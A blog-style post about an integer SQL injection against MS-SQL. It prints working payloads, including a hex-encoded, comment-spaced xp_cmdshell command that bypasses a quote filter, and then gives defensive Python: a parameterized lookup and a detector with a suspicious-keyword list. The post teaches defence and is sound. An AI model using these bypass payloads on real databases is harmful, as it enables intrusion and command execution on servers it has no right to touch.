I recently encountered a SQL Injection against a MS-SQL database. It happened to be an integer based injection. Developers thought that checking for a single quote (') in the input would be sufficient to protect against SQL Injection attacks. What this meant was I can ask the server to return information like this:-
id=1 and 1=(select @@version)--
However, because the application checks for a single quote in the input, I could not run this query successfully:-
id=1; exec master..xp_cmdshell('ping 127.0.0.1');--
This could, however, be bypassed by using a simple hex encoding trick.
id=1;declare/**/@a/**/varchar(999)/**/set@a=0x65786563206d617465722e2e78705f636d647368656c6c282770696e67203132372e302e302e312729/**/exec(@a);--
In the above example, there is also a small trick to bypass white space protection in the input by using /**/.
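The two lessons from a defender's side are that a quote filter is not input validation, and that a log or WAF check that only looks for keywords misses payloads hidden in 0x... literals and /**/ comments. The following Python is an added example written for this post, not code from the original author: it type-checks an integer id and binds it as a query parameter (shown against sqlite3 in place of MS-SQL, purely so it runs offline), and it normalizes a request parameter by stripping comment-as-whitespace and decoding hex literals before scanning it, using the three parameter values quoted in the post as constructed sample input.

```python
import re
import sqlite3

# Constructed sample request parameters; the three values are the ones quoted in the post.
SAMPLES = {
    "benign": "42",
    "version_probe": "1 and 1=(select @@version)--",
    "hex_stacked": (
        "1;declare/**/@a/**/varchar(999)/**/set@a=0x65786563206d617465722e2e"
        "78705f636d647368656c6c282770696e67203132372e302e302e312729/**/exec(@a);--"
    ),
}

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
SUSPECT_TOKENS = ("exec", "xp_cmdshell", "declare", "@@version", "--", ";")


def decode_hex_literals(value):
    """Return the text hidden inside every 0x... literal in value (latin-1, never raises)."""
    decoded = []
    for match in HEX_LITERAL.finditer(value):
        digits = match.group(1)
        if len(digits) % 2:  # odd-length literal: pad like T-SQL would
            digits = "0" + digits
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def normalize(value):
    """Collapse /**/ comments to spaces and append decoded hex so keyword checks see the real text."""
    text = re.sub(r"/\*.*?\*/", " ", value)
    return " ".join([text] + decode_hex_literals(text)).lower()


def classify(value):
    """List suspicious indicators for a parameter that is supposed to be an integer id."""
    if re.fullmatch(r"\d+", value.strip()):
        return []  # a plain integer is the only acceptable shape
    hits = ["non_integer"]
    if "/**/" in value:
        hits.append("comment_whitespace")
    if HEX_LITERAL.search(value):
        hits.append("hex_literal")
    norm = normalize(value)
    hits.extend(token for token in SUSPECT_TOKENS if token in norm)
    return hits


def make_demo_db():
    """In-memory stand-in for the application's database (sqlite3, not MS-SQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'widget'), (2, 'gadget')")
    return conn


def safe_lookup(conn, raw_id):
    """The fix: enforce the integer type, then bind the value; never concatenate it into SQL."""
    try:
        item_id = int(raw_id)
    except ValueError:
        return None  # reject anything that is not an integer, quotes or not
    row = conn.execute("SELECT name FROM items WHERE id = ?", (item_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_demo_db()
    for label, value in SAMPLES.items():
        print(f"{label:14} -> indicators={classify(value)} lookup={safe_lookup(db, value)!r}")
```

Running the block shows the benign id resolving normally while both injection strings are rejected before any SQL is built; the hex-stacked payload is flagged for its comment whitespace and hex literal, and the decoded literal surfaces the exec and xp_cmdshell tokens that a raw keyword match on the request would have missed.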